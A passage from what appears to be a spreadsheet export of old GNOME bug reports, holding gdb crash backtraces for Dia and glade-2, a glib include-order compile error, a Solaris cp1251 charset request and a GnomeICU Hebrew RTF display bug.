#118 0x407f9391 in g_object_run_dispose () from
/usr/lib/libgobject-2.0.so.0
#119 0x4034191d in gtk_object_destroy () from
/usr/lib/libgtk-x11-2.0.so.0
#120 0x403e19c9 in gtk_widget_destroy () from
/usr/lib/libgtk-x11-2.0.so.0
#121 0x40fcdf86 in umlclass_calculate_data () from
/usr/lib/dia/libuml_objects.so
#122 0x40033acf in destroy_object_list () from /usr/lib/dia/libdia.so
#123 0x40026923 in layer_destroy () from /usr/lib/dia/libdia.so
#124 0x40026891 in diagram_data_destroy () from /usr/lib/dia/libdia.so
#125 0x0805c6a3 in diagram_remove_ddisplay ()
#126 0x08069bcb in ddisplay_really_destroy ()
#127 0x4080737f in g_cclosure_marshal_VOID__VOID () from
/usr/lib/libgobject-2.0.so.0
#128 0x407f7872 in g_closure_invoke () from
/usr/lib/libgobject-2.0.so.0
#129 0x40806f46 in g_signal_emit_by_name () from
/usr/lib/libgobject-2.0.so.0
#130 0x408060ea in g_signal_emit_valist () from
/usr/lib/libgobject-2.0.so.0
#131 0x408062e3 in g_signal_emit () from /usr/lib/libgobject-2.0.so.0
#132 0x403419b5 in gtk_object_destroy () from
/usr/lib/libgtk-x11-2.0.so.0
#133 0x403e7f2c in gtk_widget_get_default_direction () from
/usr/lib/libgtk-x11-2.0.so.0
#134 0x403ebed1 in _gtk_window_reposition () from
/usr/lib/libgtk-x11-2.0.so.0
#135 0x407f9391 in g_object_run_dispose () from
/usr/lib/libgobject-2.0.so.0
#136 0x4034191d in gtk_object_destroy () from
/usr/lib/libgtk-x11-2.0.so.0
#137 0x403e19c9 in gtk_widget_destroy () from
/usr/lib/libgtk-x11-2.0.so.0
#138 0x0806699c in app_exit ()
#139 0x08073538 in menus_get_image_menubar ()
#140 0x4080737f in g_cclosure_marshal_VOID__VOID () from
/usr/lib/libgobject-2.0.so.0
#141 0x407f7872 in g_closure_invoke () from
/usr/lib/libgobject-2.0.so.0
#142 0x40806f46 in g_signal_emit_by_name () from
/usr/lib/libgobject-2.0.so.0
#143 0x408060ea in g_signal_emit_valist () from
/usr/lib/libgobject-2.0.so.0
#144 0x408062e3 in g_signal_emit () from /usr/lib/libgobject-2.0.so.0
#145 0x403e2ef4 in gtk_widget_translate_coordinates () from
/usr/lib/libgtk-x11-2.0.so.0
#146 0x407f7872 in g_closure_invoke () from
/usr/lib/libgobject-2.0.so.0
#147 0x40806f46 in g_signal_emit_by_name () from
/usr/lib/libgobject-2.0.so.0
#148 0x40805f05 in g_signal_emit_valist () from
/usr/lib/libgobject-2.0.so.0
#149 0x408062e3 in g_signal_emit () from /usr/lib/libgobject-2.0.so.0
#150 0x402b14ff in _gtk_accel_group_activate () from
/usr/lib/libgtk-x11-2.0.so.0
#151 0x402b15f4 in gtk_accel_groups_activate () from
/usr/lib/libgtk-x11-2.0.so.0
#152 0x403f1baf in _gtk_window_activate_key () from
/usr/lib/libgtk-x11-2.0.so.0
#153 0x403eeb88 in _gtk_window_query_nonaccels () from
/usr/lib/libgtk-x11-2.0.so.0
#154 0x4032b2c9 in _gtk_marshal_BOOLEAN__BOXED () from
/usr/lib/libgtk-x11-2.0.so.0
#155 0x407f7b06 in g_cclosure_new_swap () from
/usr/lib/libgobject-2.0.so.0
#156 0x407f7872 in g_closure_invoke () from
/usr/lib/libgobject-2.0.so.0
#157 0x40806a57 in g_signal_emit_by_name () from
/usr/lib/libgobject-2.0.so.0
#158 0x40805f05 in g_signal_emit_valist () from
/usr/lib/libgobject-2.0.so.0
#159 0x408062e3 in g_signal_emit () from /usr/lib/libgobject-2.0.so.0
#160 0x403e3c0c in gtk_widget_send_expose () from
/usr/lib/libgtk-x11-2.0.so.0
#161 0x4032b196 in gtk_propagate_event () from
/usr/lib/libgtk-x11-2.0.so.0
#162 0x4032a1c3 in gtk_main_do_event () from
/usr/lib/libgtk-x11-2.0.so.0
#163 0x404b38da in _gdk_events_queue () from
/usr/lib/libgdk-x11-2.0.so.0
#164 0x408911bb in unblock_source () from /usr/lib/libglib-2.0.so.0
#165 0x408920ad in g_main_context_dispatch () from
/usr/lib/libglib-2.0.so.0
#166 0x408923af in g_main_context_dispatch () from
/usr/lib/libglib-2.0.so.0
#167 0x408929de in g_main_loop_run () from /usr/lib/libglib-2.0.so.0
#168 0x40329a77 in gtk_main () from /usr/lib/libgtk-x11-2.0.so.0
#169 0x0808cc82 in main ()
#170 0x40938a51 in __libc_start_main () from /lib/libc.so.6
#171 0x0805acb9 in _start ()
Thread 1 (Thread 16384 (LWP 7011)):
#0  0x409bcaf9 in wait4 () from /lib/libc.so.6
No symbol table info available.
#1  0x40a2ff60 in sys_sigabbrev () from /lib/libc.so.6
No symbol table info available.
#2  0xbfffba80 in ?? ()
No symbol table info available.
#3  0x409bcaab in waitpid () from /lib/libc.so.6
No symbol table info available.
#4  0x4082d061 in waitpid () from /lib/libpthread.so.0
No symbol table info available.
#5  0x401189b8 in libgnomeui_module_info_get () from
/usr/lib/libgnomeui-2.so.0
No symbol table info available.
#6  0x4082e75a in __pthread_sighandler () from /lib/libpthread.so.0
No symbol table info available.
#7  
No symbol table info available.
#8  0x40fd63e0 in umlclass_get_properties () from
/usr/lib/dia/libuml_objects.so
No symbol table info available.
#9  0x40fd6590 in umlclass_get_properties () from
/usr/lib/dia/libuml_objects.so
No symbol table info available.
#10 0x4080737f in g_cclosure_marshal_VOID__VOID () from
/usr/lib/libgobject-2.0.so.0
No symbol table info available.
#11 0x407f7872 in g_closure_invoke () from /usr/lib/libgobject-2.0.so.0
No symbol table info available.
#12 0x40806f46 in g_signal_emit_by_name () from
/usr/lib/libgobject-2.0.so.0
No symbol table info available.
#13 0x408060ea in g_signal_emit_valist () from
/usr/lib/libgobject-2.0.so.0
No symbol table info available.
#14 0x40361903 in gtk_signal_emit () from /usr/lib/libgtk-x11-2.0.so.0
No symbol table info available.
#15 0x40323a83 in gtk_list_scroll_vertical () from
/usr/lib/libgtk-x11-2.0.so.0
No symbol table info available.
#16 0x4080737f in g_cclosure_marshal_VOID__VOID () from
/usr/lib/libgobject-2.0.so.0
No symbol table info available.
#17 0x407f7872 in g_closure_invoke () from /usr/lib/libgobject-2.0.so.0
No symbol table info available.
#18 0x40806f46 in g_signal_emit_by_name () from
/usr/lib/libgobject-2.0.so.0
No symbol table info available.
#19 0x408060ea in g_signal_emit_valist () from
/usr/lib/libgobject-2.0.so.0
No symbol table info available.
#20 0x408062e3 in g_signal_emit () from /usr/lib/libgobject-2.0.so.0
No symbol table info available.
#21 0x40315acb in gtk_item_deselect () from
/usr/lib/libgtk-x11-2.0.so.0
No symbol table info available.
#22 0x403246d3 in gtk_list_item_deselect () from
/usr/lib/libgtk-x11-2.0.so.0
No symbol table info available.
#23 0x4032244e in gtk_list_undo_selection () from
/usr/lib/libgtk-x11-2.0.so.0
No symbol table info available.
#24 0x40807d89 in g_cclosure_marshal_VOID__OBJECT () from
/usr/lib/libgobject-2.0.so.0
No symbol table info available.
#25 0x407f7b06 in g_cclosure_new_swap () from
/usr/lib/libgobject-2.0.so.0
No symbol table info available.
#26 0x407f7872 in g_closure_invoke () from /usr/lib/libgobject-2.0.so.0
No symbol table info available.
#27 0x4080689a in g_signal_emit_by_name () from
/usr/lib/libgobject-2.0.so.0
No symbol table info available.
#28 0x408060ea in g_signal_emit_valist () from
/usr/lib/libgobject-2.0.so.0
No symbol table info available.
#29 0x40361903 in gtk_signal_emit () from /usr/lib/libgtk-x11-2.0.so.0
No symbol table info available.
#30 0x4032165c in gtk_list_unselect_child () from
/usr/lib/libgtk-x11-2.0.so.0
No symbol table info available.
#31 0x40320fec in gtk_list_clear_items () from
/usr/lib/libgtk-x11-2.0.so.0
No symbol table info available.
#32 0x4031f6f7 in gtk_list_new () from /usr/lib/libgtk-x11-2.0.so.0
No symbol table info available.
#33 0x407f9391 in g_object_run_dispose () from
/usr/lib/libgobject-2.0.so.0
No symbol table info available.
#34 0x4034191d in gtk_object_destroy () from
/usr/lib/libgtk-x11-2.0.so.0
No symbol table info available.
#35 0x403e19c9 in gtk_widget_destroy () from
/usr/lib/libgtk-x11-2.0.so.0
No symbol table info available.
#36 0x402b62b5 in gtk_bin_get_type () from /usr/lib/libgtk-x11-2.0.so.0
No symbol table info available.
#37 0x402de915 in gtk_container_foreach () from
/usr/lib/libgtk-x11-2.0.so.0
No symbol table info available.
#38 0x402ddbf7 in gtk_container_class_list_child_properties () from
/usr/lib/libgtk-x11-2.0.so.0
No symbol table info available.
#39 0x403dd05d in gtk_viewport_new () from /usr/lib/libgtk-x11-2.0.so.0
No symbol table info available.
#40 0x4080737f in g_cclosure_marshal_VOID__VOID () from
/usr/lib/libgobject-2.0.so.0
No symbol table info available.
#41 0x407f7b06 in g_cclosure_new_swap () from
/usr/lib/libgobject-2.0.so.0
No symbol table info available.
#42 0x407f7872 in g_closure_invoke () from /usr/lib/libgobject-2.0.so.0
No symbol table info available.
#43 0x40806c0a in g_signal_emit_by_name () from
/usr/lib/libgobject-2.0.so.0
No symbol table info available.
#44 0x408060ea in g_signal_emit_valist () from
/usr/lib/libgobject-2.0.so.0
No symbol table info available.
#45 0x408062e3 in g_signal_emit () from /usr/lib/libgobject-2.0.so.0
No symbol table info available.
#46 0x403419b5 in gtk_object_destroy () from
/usr/lib/libgtk-x11-2.0.so.0
No symbol table info available.
#47 0x403e7f2c in gtk_widget_get_default_direction () from
/usr/lib/libgtk-x11-2.0.so.0
No symbol table info available.
#48 0x407f9391 in g_object_run_dispose () from
/usr/lib/libgobject-2.0.so.0
No symbol table info available.
#49 0x4034191d in gtk_object_destroy () from
/usr/lib/libgtk-x11-2.0.so.0
No symbol table info available.
#50 0x403e19c9 in gtk_widget_destroy () from
/usr/lib/libgtk-x11-2.0.so.0
No symbol table info available.
#51 0x402b62b5 in gtk_bin_get_type () from /usr/lib/libgtk-x11-2.0.so.0
No symbol table info available.
#52 0x4035b973 in gtk_scrolled_window_get_shadow_type () from
/usr/lib/libgtk-x11-2.0.so.0
No symbol table info available.
#53 0x402de915 in gtk_container_foreach () from
/usr/lib/libgtk-x11-2.0.so.0
No symbol table info available.
#54 0x402ddbf7 in gtk_container_class_list_child_properties () from
/usr/lib/libgtk-x11-2.0.so.0
No symbol table info available.
#55 0x4035b596 in gtk_scrolled_window_get_shadow_type () from
/usr/lib/libgtk-x11-2.0.so.0
No symbol table info available.
#56 0x4080737f in g_cclosure_marshal_VOID__VOID () from
/usr/lib/libgobject-2.0.so.0
No symbol table info available.
#57 0x407f7b06 in g_cclosure_new_swap () from
/usr/lib/libgobject-2.0.so.0
No symbol table info available.
#58 0x407f7872 in g_closure_invoke () from /usr/lib/libgobject-2.0.so.0
No symbol table info available.
#59 0x40806c0a in g_signal_emit_by_name () from
/usr/lib/libgobject-2.0.so.0
No symbol table info available.
#60 0x408060ea in g_signal_emit_valist () from
/usr/lib/libgobject-2.0.so.0
No symbol table info available.
#61 0x408062e3 in g_signal_emit () from /usr/lib/libgobject-2.0.so.0
No symbol table info available.
#62 0x403419b5 in gtk_object_destroy () from
/usr/lib/libgtk-x11-2.0.so.0
No symbol table info available.
#63 0x403e7f2c in gtk_widget_get_default_direction () from
/usr/lib/libgtk-x11-2.0.so.0
No symbol table info available.
#64 0x407f9391 in g_object_run_dispose () from
/usr/lib/libgobject-2.0.so.0
No symbol table info available.
#65 0x4034191d in gtk_object_destroy () from
/usr/lib/libgtk-x11-2.0.so.0
No symbol table info available.
#66 0x403e19c9 in gtk_widget_destroy () from
/usr/lib/libgtk-x11-2.0.so.0
No symbol table info available.
#67 0x402ba55e in gtk_box_set_child_packing () from
/usr/lib/libgtk-x11-2.0.so.0
No symbol table info available.
#68 0x402de915 in gtk_container_foreach () from
/usr/lib/libgtk-x11-2.0.so.0
No symbol table info available.
#69 0x402ddbf7 in gtk_container_class_list_child_properties () from
/usr/lib/libgtk-x11-2.0.so.0
No symbol table info available.
#70 0x4080737f in g_cclosure_marshal_VOID__VOID () from
/usr/lib/libgobject-2.0.so.0
No symbol table info available.
#71 0x407f7b06 in g_cclosure_new_swap () from
/usr/lib/libgobject-2.0.so.0
No symbol table info available.
#72 0x407f7872 in g_closure_invoke () from /usr/lib/libgobject-2.0.so.0
No symbol table info available.
#73 0x40806c0a in g_signal_emit_by_name () from
/usr/lib/libgobject-2.0.so.0
No symbol table info available.
#74 0x408060ea in g_signal_emit_valist () from
/usr/lib/libgobject-2.0.so.0
No symbol table info available.
#75 0x408062e3 in g_signal_emit () from /usr/lib/libgobject-2.0.so.0
No symbol table info available.
#76 0x403419b5 in gtk_object_destroy () from
/usr/lib/libgtk-x11-2.0.so.0
No symbol table info available.
#77 0x403e7f2c in gtk_widget_get_default_direction () from
/usr/lib/libgtk-x11-2.0.so.0
No symbol table info available.
#78 0x407f9391 in g_object_run_dispose () from
/usr/lib/libgobject-2.0.so.0
No symbol table info available.
#79 0x4034191d in gtk_object_destroy () from
/usr/lib/libgtk-x11-2.0.so.0
No symbol table info available.
#80 0x403e19c9 in gtk_widget_destroy () from
/usr/lib/libgtk-x11-2.0.so.0
No symbol table info available.
#81 0x402ba55e in gtk_box_set_child_packing () from
/usr/lib/libgtk-x11-2.0.so.0
No symbol table info available.
#82 0x402de915 in gtk_container_foreach () from
/usr/lib/libgtk-x11-2.0.so.0
No symbol table info available.
#83 0x402ddbf7 in gtk_container_class_list_child_properties () from
/usr/lib/libgtk-x11-2.0.so.0
No symbol table info available.
#84 0x4080737f in g_cclosure_marshal_VOID__VOID () from
/usr/lib/libgobject-2.0.so.0
No symbol table info available.
#85 0x407f7b06 in g_cclosure_new_swap () from
/usr/lib/libgobject-2.0.so.0
No symbol table info available.
#86 0x407f7872 in g_closure_invoke () from /usr/lib/libgobject-2.0.so.0
No symbol table info available.
#87 0x40806c0a in g_signal_emit_by_name () from
/usr/lib/libgobject-2.0.so.0
No symbol table info available.
#88 0x408060ea in g_signal_emit_valist () from
/usr/lib/libgobject-2.0.so.0
No symbol table info available.
#89 0x408062e3 in g_signal_emit () from /usr/lib/libgobject-2.0.so.0
No symbol table info available.
#90 0x403419b5 in gtk_object_destroy () from
/usr/lib/libgtk-x11-2.0.so.0
No symbol table info available.
#91 0x403e7f2c in gtk_widget_get_default_direction () from
/usr/lib/libgtk-x11-2.0.so.0
No symbol table info available.
#92 0x407f926d in g_object_class_list_properties () from
/usr/lib/libgobject-2.0.so.0
No symbol table info available.
#93 0x403e18b8 in gtk_widget_unparent () from
/usr/lib/libgtk-x11-2.0.so.0
No symbol table info available.
#94 0x4033c736 in gtk_notebook_new () from /usr/lib/libgtk-x11-2.0.so.0
No symbol table info available.
#95 0x4033a08b in gtk_notebook_new () from /usr/lib/libgtk-x11-2.0.so.0
No symbol table info available.
#96 0x4080737f in g_cclosure_marshal_VOID__VOID () from
/usr/lib/libgobject-2.0.so.0
No symbol table info available.
#97 0x407f7b06 in g_cclosure_new_swap () from
/usr/lib/libgobject-2.0.so.0
No symbol table info available.
#98 0x407f7872 in g_closure_invoke () from /usr/lib/libgobject-2.0.so.0
No symbol table info available.
#99 0x40806c0a in g_signal_emit_by_name () from
/usr/lib/libgobject-2.0.so.0
No symbol table info available.
#100 0x408060ea in g_signal_emit_valist () from
/usr/lib/libgobject-2.0.so.0
No symbol table info available.
#101 0x408062e3 in g_signal_emit () from /usr/lib/libgobject-2.0.so.0
No symbol table info available.
#102 0x403419b5 in gtk_object_destroy () from
/usr/lib/libgtk-x11-2.0.so.0
No symbol table info available.
#103 0x403e7f2c in gtk_widget_get_default_direction () from
/usr/lib/libgtk-x11-2.0.so.0
No symbol table info available.
#104 0x407f9391 in g_object_run_dispose () from
/usr/lib/libgobject-2.0.so.0
No symbol table info available.
#105 0x4034191d in gtk_object_destroy () from
/usr/lib/libgtk-x11-2.0.so.0
No symbol table info available.
#106 0x403e19c9 in gtk_widget_destroy () from
/usr/lib/libgtk-x11-2.0.so.0
No symbol table info available.
#107 0x402ba55e in gtk_box_set_child_packing () from
/usr/lib/libgtk-x11-2.0.so.0
No symbol table info available.
#108 0x402de915 in gtk_container_foreach () from
/usr/lib/libgtk-x11-2.0.so.0
No symbol table info available.
#109 0x402ddbf7 in gtk_container_class_list_child_properties () from
/usr/lib/libgtk-x11-2.0.so.0
No symbol table info available.
#110 0x4080737f in g_cclosure_marshal_VOID__VOID () from
/usr/lib/libgobject-2.0.so.0
No symbol table info available.
#111 0x407f7b06 in g_cclosure_new_swap () from
/usr/lib/libgobject-2.0.so.0
No symbol table info available.
#112 0x407f7872 in g_closure_invoke () from
/usr/lib/libgobject-2.0.so.0
No symbol table info available.
#113 0x40806c0a in g_signal_emit_by_name () from
/usr/lib/libgobject-2.0.so.0
No symbol table info available.
#114 0x408060ea in g_signal_emit_valist () from
/usr/lib/libgobject-2.0.so.0
No symbol table info available.
#115 0x408062e3 in g_signal_emit () from /usr/lib/libgobject-2.0.so.0
No symbol table info available.
#116 0x403419b5 in gtk_object_destroy () from
/usr/lib/libgtk-x11-2.0.so.0
No symbol table info available.
#117 0x403e7f2c in gtk_widget_get_default_direction () from
/usr/lib/libgtk-x11-2.0.so.0
No symbol table info available.
#118 0x407f9391 in g_object_run_dispose () from
/usr/lib/libgobject-2.0.so.0
No symbol table info available.
#119 0x4034191d in gtk_object_destroy () from
/usr/lib/libgtk-x11-2.0.so.0
No symbol table info available.
#120 0x403e19c9 in gtk_widget_destroy () from
/usr/lib/libgtk-x11-2.0.so.0
No symbol table info available.
#121 0x40fcdf86 in umlclass_calculate_data () from
/usr/lib/dia/libuml_objects.so
No symbol table info available.
#122 0x40033acf in destroy_object_list () from /usr/lib/dia/libdia.so
No symbol table info available.
#123 0x40026923 in layer_destroy () from /usr/lib/dia/libdia.so
No symbol table info available.
#124 0x40026891 in diagram_data_destroy () from /usr/lib/dia/libdia.so
No symbol table info available.
#125 0x0805c6a3 in diagram_remove_ddisplay ()
No symbol table info available.
#126 0x08069bcb in ddisplay_really_destroy ()
No symbol table info available.
#127 0x4080737f in g_cclosure_marshal_VOID__VOID () from
/usr/lib/libgobject-2.0.so.0
No symbol table info available.
#128 0x407f7872 in g_closure_invoke () from
/usr/lib/libgobject-2.0.so.0
No symbol table info available.
#129 0x40806f46 in g_signal_emit_by_name () from
/usr/lib/libgobject-2.0.so.0
No symbol table info available.
#130 0x408060ea in g_signal_emit_valist () from
/usr/lib/libgobject-2.0.so.0
No symbol table info available.
#131 0x408062e3 in g_signal_emit () from /usr/lib/libgobject-2.0.so.0
No symbol table info available.
#132 0x403419b5 in gtk_object_destroy () from
/usr/lib/libgtk-x11-2.0.so.0
No symbol table info available.
#133 0x403e7f2c in gtk_widget_get_default_direction () from
/usr/lib/libgtk-x11-2.0.so.0
No symbol table info available.
#134 0x403ebed1 in _gtk_window_reposition () from
/usr/lib/libgtk-x11-2.0.so.0
No symbol table info available.
#135 0x407f9391 in g_object_run_dispose () from
/usr/lib/libgobject-2.0.so.0
No symbol table info available.
#136 0x4034191d in gtk_object_destroy () from
/usr/lib/libgtk-x11-2.0.so.0
No symbol table info available.
#137 0x403e19c9 in gtk_widget_destroy () from
/usr/lib/libgtk-x11-2.0.so.0
No symbol table info available.
#138 0x0806699c in app_exit ()
No symbol table info available.
#139 0x08073538 in menus_get_image_menubar ()
No symbol table info available.
#140 0x4080737f in g_cclosure_marshal_VOID__VOID () from
/usr/lib/libgobject-2.0.so.0
No symbol table info available.
#141 0x407f7872 in g_closure_invoke () from
/usr/lib/libgobject-2.0.so.0
No symbol table info available.
#142 0x40806f46 in g_signal_emit_by_name () from
/usr/lib/libgobject-2.0.so.0
No symbol table info available.
#143 0x408060ea in g_signal_emit_valist () from
/usr/lib/libgobject-2.0.so.0
No symbol table info available.
#144 0x408062e3 in g_signal_emit () from /usr/lib/libgobject-2.0.so.0
No symbol table info available.
#145 0x403e2ef4 in gtk_widget_translate_coordinates () from
/usr/lib/libgtk-x11-2.0.so.0
No symbol table info available.
#146 0x407f7872 in g_closure_invoke () from
/usr/lib/libgobject-2.0.so.0
No symbol table info available.
#147 0x40806f46 in g_signal_emit_by_name () from
/usr/lib/libgobject-2.0.so.0
No symbol table info available.
#148 0x40805f05 in g_signal_emit_valist () from
/usr/lib/libgobject-2.0.so.0
No symbol table info available.
#149 0x408062e3 in g_signal_emit () from /usr/lib/libgobject-2.0.so.0
No symbol table info available.
#150 0x402b14ff in _gtk_accel_group_activate () from
/usr/lib/libgtk-x11-2.0.so.0
No symbol table info a</t>
  </si>
  <si>
    <t>bug-buddy</t>
  </si>
  <si>
    <t>GLIB-394258</t>
  </si>
  <si>
    <t>gthread.c: illegal include order</t>
  </si>
  <si>
    <t>Please describe the problem:
If G_OS_WIN32 is not defined time.h and sys/time.h will be included.
But '#include ' and '#include ' are before the definition of G_OS_WIN32.
So headers are always included.
Steps to reproduce:
1. compile gthread.c(Revision 52275232)
Actual results:
Following message is displayed.(Visual C++)
gthread.c(42) : fatal error C1083: Cannot open include file: 'sys/time.h': No such file or directory
Expected results:
These headers should be moved after '#include glib.h'.
Does this happen every time?
/trunk/glib/gthread.c
/branches/glib-2-12/glib/gthread.c
Other information:</t>
  </si>
  <si>
    <t>GLIB-104738</t>
  </si>
  <si>
    <t>cp1251 charset for Solaris</t>
  </si>
  <si>
    <t>Solaris has cp1251 charset support as ansi-1251 in their iconv libraries
and ru_RU.ANSI1251 locale so I'd want to have
charset.alias entry for it. See also bug 12951 for related change for pango.</t>
  </si>
  <si>
    <t>GNOMEICU-93553</t>
  </si>
  <si>
    <t>instead of hebrew text i see  wierd characters</t>
  </si>
  <si>
    <t xml:space="preserve">Package: GnomeICU
Severity: major
Version: 0.98.114
Synopsis: instead of hebrew text i see  wierd characters
Bugzilla-Product: GnomeICU
Bugzilla-Component: Message dialogs
Description:
Description of Problem:
i can't see hebrew. i can send hebrew and i can see the hebrew that i
write good but when i get a message in hebrew i see it like with font
that doesn't support hebrew plus i always see the word bidi.
Steps to reproduce the problem:
1. just get a message with hebrew characters
2. 
3. 
Actual Results:
see weird characters instead
Expected Results:
see characters on hebrew font
How often does this happen?
all the time
Additional Information:
this is what i get when i get a message in hebrew:
** (gnomeicu.hebrew:12727): WARNING **: Error in RTF message parsing :
Unknown control word..
Please report this message to 
with the following log of the RTF encoded message : 
{\rtf1\fbidis\ansi\ansicpg1255\deff0\deflang1037{\fonttbl{\f0\fnil\fcharset177{\*\fname
Times New Roman}Times New Roman (Hebrew)}{\f1\fnil\fcharset0 Times New
Roman}}
{\colortbl \red0\green0\blue0}
\viewkind4\uc1\pard\ltrpar\cf1\f0\rtlch\fs20\'e9\'ee\'e0\'f0\'e9\'e9\'f7\f1\ltrch\par
}
The current position was : ltrch\par
}
------- Bug moved to this database by unknown@bugzilla.gnome.org 2002-09-18 06:06 -------
Unknown version unspecified in product GnomeICU. Setting version to 0.94.1.
The original reporter (ufk2000@netvision.net.il) of this bug does not have an account here.
Reassigning to the exporter unknown@bugzilla.gnome.org.
Reassigning to the default owner of the component jwise@springthrough.com.
</t>
  </si>
  <si>
    <t>ufk2000</t>
  </si>
  <si>
    <t>GLADE-LEGACY-128340</t>
  </si>
  <si>
    <t>glade-2 crashes when editing menus of the Menu Bar</t>
  </si>
  <si>
    <t xml:space="preserve">Package: glade
Severity: critical
Version: 1.1.3
Synopsis: glade-2 crashes when editing menus of the Menu Bar
Bugzilla-Product: glade
Bugzilla-Component: general
BugBuddy-GnomeVersion: 2.0 (2.2.0.1)
Description:
Description of Problem:
Steps to reproduce the problem:
1. start new project with glade-2
2. create a window
3. add vertical 3 pane box (it does not matter how many)
4. add menu bar
5. make menu bar active
6. click on Edit Menus...  ( in property window)
Actual Results:
glade-2 crashes
Expected Results:
I should be able to edit properties of the menu
How often does this happen?
alwaysw
Additional Information:
stock REDHAT 9
Debugging Information:
Backtrace was generated from '/usr/bin/glade-2'
(no debugging symbols found)...(no debugging symbols found)...(no
debugging symbols found)...
(no debugging symbols found)...(no debugging symbols found)...(no
debugging symbols found)...
(no debugging symbols found)...(no debugging symbols found)...(no
debugging symbols found)...
(no debugging symbols found)...(no debugging symbols found)...(no
debugging symbols found)...
(no debugging symbols found)...(no debugging symbols found)...(no
debugging symbols found)...
(no debugging symbols found)...(no debugging symbols found)...(no
debugging symbols found)...
(no debugging symbols found)...(no debugging symbols found)...(no
debugging symbols found)...
(no debugging symbols found)...(no debugging symbols found)...(no
debugging symbols found)...
(no debugging symbols found)...(no debugging symbols found)...(no
debugging symbols found)...
(no debugging symbols found)...(no debugging symbols found)...(no
debugging symbols found)...
(no debugging symbols found)...(no debugging symbols found)...[New
Thread 1086130880 (LWP 15477)]
(no debugging symbols found)...
(no debugging symbols found)...(no debugging symbols found)...(no
debugging symbols found)...
(no debugging symbols found)...(no debugging symbols found)...(no
debugging symbols found)...
(no debugging symbols found)...(no debugging symbols found)...(no
debugging symbols found)...
(no debugging symbols found)...(no debugging symbols found)...(no
debugging symbols found)...
(no debugging symbols found)...(no debugging symbols found)...(no
debugging symbols found)...
(no debugging symbols found)...(no debugging symbols found)...(no
debugging symbols found)...
(no debugging symbols found)...(no debugging symbols found)...(no
debugging symbols found)...
(no debugging symbols found)...(no debugging symbols found)...(no
debugging symbols found)...
(no debugging symbols found)...(no debugging symbols found)...(no
debugging symbols found)...
(no debugging symbols found)...(no debugging symbols found)...(no
debugging symbols found)...
(no debugging symbols found)...(no debugging symbols found)...(no
debugging symbols found)...0xffffe002 in ??
    ()
#0  0xffffe002 in ?? ()
#1  0x4007ffa7 in libgnomeui_module_info_get () from
/usr/lib/libgnomeui-2.so.0
#2  
#3  0x420734c1 in free () from /lib/tls/libc.so.6
#4  0x407ad6c4 in g_free () from /usr/lib/libglib-2.0.so.0
#5  0x4036d225 in gtk_label_get_mnemonic_keyval () from
/usr/lib/libgtk-x11-2.0.so.0
#6  0x4036d500 in gtk_label_set_text () from
/usr/lib/libgtk-x11-2.0.so.0
#7  0x4036cc6c in gtk_label_new () from /usr/lib/libgtk-x11-2.0.so.0
#8  0x0807b73e in glade_menu_editor_get_type ()
#9  0x0807e600 in glade_menu_editor_new ()
#10 0x080c1191 in gb_menu_bar_new ()
#11 0x40766d77 in g_cclosure_marshal_VOID__VOID () from
/usr/lib/libgobject-2.0.so.0
#12 0x40753ed7 in g_closure_invoke () from /usr/lib/libgobject-2.0.so.0
#13 0x40766983 in g_signal_emit_by_name () from
/usr/lib/libgobject-2.0.so.0
#14 0x407659a8 in g_signal_emit_valist () from
/usr/lib/libgobject-2.0.so.0
#15 0x40765be4 in g_signal_emit () from /usr/lib/libgobject-2.0.so.0
#16 0x404688ed in gtk_widget_activate () from
/usr/lib/libgtk-x11-2.0.so.0
#17 0x40392682 in gtk_menu_shell_activate_item () from
/usr/lib/libgtk-x11-2.0.so.0
#18 0x403918ff in _gtk_menu_shell_activate () from
/usr/lib/libgtk-x11-2.0.so.0
#19 0x4038ad6b in gtk_menu_reorder_child () from
/usr/lib/libgtk-x11-2.0.so.0
#20 0x40382c2f in _gtk_marshal_BOOLEAN__BOXED () from
/usr/lib/libgtk-x11-2.0.so.0
#21 0x40754247 in g_cclosure_new_swap () from
/usr/lib/libgobject-2.0.so.0
#22 0x40753ed7 in g_closure_invoke () from /usr/lib/libgobject-2.0.so.0
#23 0x40766439 in g_signal_emit_by_name () from
/usr/lib/libgobject-2.0.so.0
#24 0x407657af in g_signal_emit_valist () from
/usr/lib/libgobject-2.0.so.0
#25 0x40765be4 in g_signal_emit () from /usr/lib/libgobject-2.0.so.0
#26 0x404686fb in gtk_widget_send_expose () from
/usr/lib/libgtk-x11-2.0.so.0
#27 0x40382a27 in gtk_propagate_event () from
/usr/lib/libgtk-x11-2.0.so.0
#28 0x40381725 in gtk_main_do_event () from
/usr/lib/libgtk-x11-2.0.so.0
#29 0x405411a5 in _gdk_events_queue () from
/usr/lib/libgdk-x11-2.0.so.0
#30 0x407a7b35 in g_get_current_time () from /usr/lib/libglib-2.0.so.0
#31 0x407a8b78 in g_main_context_dispatch () from
/usr/lib/libglib-2.0.so.0
#32 0x407a8e8d in g_main_context_dispatch () from
/usr/lib/libglib-2.0.so.0
#33 0x407a958f in g_main_loop_run () from /usr/lib/libglib-2.0.so.0
#34 0x4061a328 in bonobo_main () from /usr/lib/libbonobo-2.so.0
#35 0x0809250b in main ()
#36 0x42015574 in __libc_start_main () from /lib/tls/libc.so.6
Thread 1 (Thread 1086130880 (LWP 15477)):
#0  0xffffe002 in ?? ()
No symbol table info available.
#1  0x4007ffa7 in libgnomeui_module_info_get () from
/usr/lib/libgnomeui-2.so.0
No symbol table info available.
#2  
No symbol table info available.
#3  0x420734c1 in free () from /lib/tls/libc.so.6
No symbol table info available.
#4  0x407ad6c4 in g_free () from /usr/lib/libglib-2.0.so.0
No symbol table info available.
#5  0x4036d225 in gtk_label_get_mnemonic_keyval () from
/usr/lib/libgtk-x11-2.0.so.0
No symbol table info available.
#6  0x4036d500 in gtk_label_set_text () from
/usr/lib/libgtk-x11-2.0.so.0
No symbol table info available.
#7  0x4036cc6c in gtk_label_new () from /usr/lib/libgtk-x11-2.0.so.0
No symbol table info available.
#8  0x0807b73e in glade_menu_editor_get_type ()
No symbol table info available.
#9  0x0807e600 in glade_menu_editor_new ()
No symbol table info available.
#10 0x080c1191 in gb_menu_bar_new ()
No symbol table info available.
#11 0x40766d77 in g_cclosure_marshal_VOID__VOID () from
/usr/lib/libgobject-2.0.so.0
No symbol table info available.
#12 0x40753ed7 in g_closure_invoke () from /usr/lib/libgobject-2.0.so.0
No symbol table info available.
#13 0x40766983 in g_signal_emit_by_name () from
/usr/lib/libgobject-2.0.so.0
No symbol table info available.
#14 0x407659a8 in g_signal_emit_valist () from
/usr/lib/libgobject-2.0.so.0
No symbol table info available.
